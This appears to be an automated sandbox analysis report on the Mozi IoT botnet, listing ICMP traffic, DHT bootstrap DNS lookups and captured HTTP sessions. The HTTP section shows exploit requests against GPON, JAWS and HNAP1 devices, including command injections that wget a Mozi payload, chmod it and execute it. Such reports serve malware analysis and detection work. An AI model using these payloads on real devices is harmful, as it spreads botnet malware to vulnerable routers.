                                                                                                                  Feb 6, 2021 11:36:50.970527887 CET202.239.98.106192.168.2.20b0ce(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:50.970568895 CET202.239.98.106192.168.2.20b0ce(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:50.970587969 CET202.239.98.106192.168.2.20b0ce(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:54.750679016 CET216.66.80.222192.168.2.2094f9(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:36:55.008846998 CET187.95.254.41192.168.2.207973(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:55.362935066 CET46.83.254.38192.168.2.2080aa(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:57.700253963 CET149.11.89.129192.168.2.2046bf(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:57.803073883 CET170.39.196.42192.168.2.20c070(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:36:58.075360060 CET87.167.162.206192.168.2.20a9c0(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:58.839452028 CET12.83.40.125192.168.2.203e85(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:01.766206980 CET80.250.191.54192.168.2.20bdf3(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:01.952404022 CET154.85.22.47192.168.2.207065(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:04.904623032 CET198.202.27.75192.168.2.2081ca(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:08.978775978 CET133.101.244.12192.168.2.20c032(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:11.468447924 CET93.189.172.1192.168.2.20c68c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:11.468493938 CET93.189.172.1192.168.2.20c68c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:11.958113909 CET201.218.129.193192.168.2.20bb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:11.958175898 CET201.218.129.193192.168.2.20bb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:14.572334051 CET93.189.172.1192.168.2.20c68c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:14.955627918 CET201.218.129.193192.168.2.20bb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:15.732269049 CET185.53.64.10192.168.2.20b476(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:18.727646112 CET94.216.193.84192.168.2.20c71a(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:22.315923929 CET213.88.203.94192.168.2.20f88c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:23.765324116 CET217.7.204.55192.168.2.204166(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:25.949588060 CET200.130.102.2192.168.2.20abbf(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:29.760623932 CET92.45.252.1192.168.2.201d2e(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:29.880379915 CET59.180.210.210192.168.2.205deb(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:30.823168993 CET24.124.216.86192.168.2.20ed07(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:32.144381046 CET152.255.157.71192.168.2.201991(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:32.716325045 CET176.20.218.166192.168.2.204aa3(Port unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:39.948029995 CET192.168.1.238192.168.2.203db6(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:39.948069096 CET192.168.1.238192.168.2.203db6(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:40.756258011 CET91.96.55.112192.168.2.207188(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:41.912420034 CET204.225.31.22192.168.2.204023(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:42.948151112 CET192.168.1.238192.168.2.203db6(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:43.980493069 CET193.50.198.5192.168.2.20800e(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:44.010180950 CET203.13.23.2192.168.2.203a5c(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:45.761795998 CET130.93.107.38192.168.2.205c64(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:46.778093100 CET207.252.72.17192.168.2.20dbdc(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:46.778139114 CET207.252.72.17192.168.2.20dbdc(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:46.816617012 CET96.110.161.14192.168.2.20e926(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:49.778034925 CET207.252.72.17192.168.2.20dbdc(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:50.712635040 CET80.255.14.222192.168.2.20e069(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:50.833848000 CET131.100.27.86192.168.2.205e9b(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:50.842205048 CET137.103.65.26192.168.2.2033c0(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:53.300148010 CET84.246.147.2192.168.2.20ab76(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:53.300194979 CET84.246.147.2192.168.2.20ab76(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:53.873837948 CET24.30.175.202192.168.2.20b0bf(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:56.350054026 CET84.246.147.2192.168.2.20ab76(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:56.616941929 CET154.54.44.198192.168.2.20eb98(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:57.715239048 CET77.7.89.221192.168.2.20a656(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:57.798033953 CET149.28.33.22192.168.2.207610(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:58.016733885 CET211.122.27.21192.168.2.20330(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:01.420928001 CET154.54.44.198192.168.2.20eb98(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:02.713757038 CET149.11.89.129192.168.2.2059f4(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:04.710871935 CET213.222.29.194192.168.2.204bc6(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:04.717515945 CET93.221.222.106192.168.2.2017e9(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:05.743998051 CET149.11.89.129192.168.2.20af2c(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:07.142713070 CET37.132.182.1192.168.2.209c62(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:11.732172012 CET192.109.241.43192.168.2.207181(Port unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:11.782967091 CET217.121.74.29192.168.2.20e380(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:11.804955959 CET91.135.147.130192.168.2.20d8a(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:13.767189980 CET81.31.150.226192.168.2.202c0e(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:18.714807987 CET87.149.61.90192.168.2.202b5e(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:18.843714952 CET78.38.241.74192.168.2.20f1ca(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:21.574739933 CET103.24.165.198192.168.2.207d0f(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:21.574815989 CET103.24.165.198192.168.2.207d0f(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:22.828773975 CET63.148.112.178192.168.2.208de4(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:24.778537035 CET103.24.165.198192.168.2.207d0f(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:25.853256941 CET67.142.145.156192.168.2.20a32f(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:28.774642944 CET212.149.148.17192.168.2.202888(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:28.859281063 CET192.168.221.30192.168.2.2087cd(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:28.859548092 CET192.168.221.30192.168.2.2087cd(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:30.950723886 CET89.64.16.63192.168.2.20d90f(Port unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:31.859373093 CET192.168.221.30192.168.2.2087cd(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:32.014236927 CET216.66.112.1192.168.2.20fb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:32.014302969 CET216.66.112.1192.168.2.20fb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:32.765140057 CET185.33.175.11192.168.2.20bea7(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:32.842708111 CET172.241.192.161192.168.2.202d74(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:36.759669065 CET217.28.252.209192.168.2.206f68(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:37.165035009 CET192.168.145.206192.168.2.203fc0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:37.165076971 CET192.168.145.206192.168.2.203fc0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:39.957926035 CET191.6.231.6192.168.2.205e2b(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:40.171212912 CET192.168.145.206192.168.2.203fc0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:46.822525978 CET10.150.7.30192.168.2.2051ef(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:46.822566032 CET10.150.7.30192.168.2.2051ef(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:49.074318886 CET131.221.122.181192.168.2.20be7c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:49.074363947 CET131.221.122.181192.168.2.20be7c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:49.822412968 CET10.150.7.30192.168.2.2051ef(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:50.891179085 CET64.58.5.1192.168.2.20afa5(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:52.356667995 CET131.221.122.181192.168.2.20be7c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:52.951423883 CET148.240.205.26192.168.2.208c73(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:53.705729008 CET80.255.15.98192.168.2.20ede5(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:54.878962040 CET76.167.28.194192.168.2.20f232(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:57.745919943 CET178.27.146.71192.168.2.201bae(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:59.016284943 CET216.66.112.1192.168.2.20fb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:03.893297911 CET76.91.242.109192.168.2.20f57(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:03.893337965 CET76.91.242.109192.168.2.20f57(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:06.902409077 CET76.91.242.109192.168.2.20f57(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:08.252276897 CET152.255.139.166192.168.2.201e68(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:39:08.696783066 CET149.11.89.129192.168.2.20dba3(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:10.859294891 CET162.39.153.129192.168.2.20fb97(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:10.859337091 CET162.39.153.129192.168.2.20fb97(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:11.007601023 CET43.225.35.238192.168.2.206b5c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:11.997694016 CET43.225.35.238192.168.2.206b5c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:11.997744083 CET43.225.35.238192.168.2.206b5c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:12.840609074 CET64.182.214.179192.168.2.201722(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:39:13.859841108 CET162.39.153.129192.168.2.20fb97(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:13.928651094 CET211.237.128.254192.168.2.2070a4(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:39:17.747221947 CET87.155.20.45192.168.2.20360a(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:21.751763105 CET178.27.214.206192.168.2.20474(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:22.834263086 CET85.46.86.42192.168.2.209346(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:22.834309101 CET85.46.86.42192.168.2.209346(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:22.834326982 CET85.46.86.42192.168.2.209346(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:23.908087969 CET103.4.243.6192.168.2.204bb8(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:39:24.734756947 CET78.64.7.35192.168.2.20c141(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:24.749552965 CET84.141.215.230192.168.2.20574f(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:28.759598017 CET217.236.144.108192.168.2.201c47(Unknown)Destination Unreachable

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                  Feb 6, 2021 11:35:36.888931036 CET192.168.2.208.8.8.80x2Standard query (0)dht.transmissionbt.comA (IP address)IN (0x0001)
                                                                                                                  Feb 6, 2021 11:35:36.937874079 CET192.168.2.208.8.8.80x3Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)
                                                                                                                  Feb 6, 2021 11:35:36.986057997 CET192.168.2.208.8.8.80x4Standard query (0)router.utorrent.comA (IP address)IN (0x0001)
                                                                                                                  Feb 6, 2021 11:35:37.037029982 CET192.168.2.208.8.8.80x5Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                  Feb 6, 2021 11:35:36.936109066 CET8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com212.129.33.59A (IP address)IN (0x0001)
                                                                                                                  Feb 6, 2021 11:35:36.936109066 CET8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com87.98.162.88A (IP address)IN (0x0001)
                                                                                                                  Feb 6, 2021 11:35:36.985169888 CET8.8.8.8192.168.2.200x3No error (0)router.bittorrent.com67.215.246.10A (IP address)IN (0x0001)
                                                                                                                  Feb 6, 2021 11:35:37.036135912 CET8.8.8.8192.168.2.200x4No error (0)router.utorrent.com82.221.103.244A (IP address)IN (0x0001)
                                                                                                                  Feb 6, 2021 11:35:37.087090969 CET8.8.8.8192.168.2.200x5No error (0)bttracker.debian.orgbttracker.acc.umu.seCNAME (Canonical name)IN (0x0001)
                                                                                                                  Feb 6, 2021 11:35:37.087090969 CET8.8.8.8192.168.2.200x5No error (0)bttracker.acc.umu.se130.239.18.159A (IP address)IN (0x0001)

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • 127.0.0.1:80
                                                                                                                  • 175.203.81.2:80
                                                                                                                  • 144.76.43.37:80
                                                                                                                  • 23.254.64.88:80
                                                                                                                  • 23.217.12.208:80
                                                                                                                  • 47.246.22.230:80
                                                                                                                  • 159.140.205.214:80
                                                                                                                  • 24.239.192.38:80
                                                                                                                  • 13.89.231.175:80
                                                                                                                  • 113.161.185.44:80
                                                                                                                  • 193.248.153.76:80
                                                                                                                  • 72.200.237.136:49152
                                                                                                                  • 74.79.213.38:80
                                                                                                                  • 190.189.194.46:49152
                                                                                                                  • 23.236.242.26:80
                                                                                                                  • 23.12.191.118:80
                                                                                                                  • 180.254.107.55:80
                                                                                                                  • 34.66.226.190:80

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  0192.168.2.2038870151.139.241.25180
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:35:25.024089098 CET52OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                  Feb 6, 2021 11:35:25.069941044 CET53INHTTP/1.1 404 127.0.0.1 NOT found
                                                                                                                  Date: Sat, 06 Feb 2021 10:35:25 GMT
                                                                                                                  Server: Varnish
                                                                                                                  X-Cache: MISS
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: keep-alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  1192.168.2.2048066175.203.81.280
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:35:45.030977964 CET241OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 175.203.81.2:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:35:45.311620951 CET242INHTTP/1.1 302 Found
                                                                                                                  Location: http://175.203.81.2:80:8899
                                                                                                                  Content-Length: 0
                                                                                                                  Date: Sat, 06 Feb 2021 10:35:44 GMT
                                                                                                                  Server: httpd


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  10192.168.2.205898813.89.231.17580
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:47.954700947 CET553OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 13.89.231.175:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:36:48.112098932 CET556INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:47 GMT
                                                                                                                  Content-Length: 1245
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailab


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  11192.168.2.2036372113.161.185.4480
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:48.014179945 CET554OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                  Host: 113.161.185.44:80
                                                                                                                  Content-Type: text/xml; charset="utf-8"
                                                                                                                  SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                  Content-Length: 640
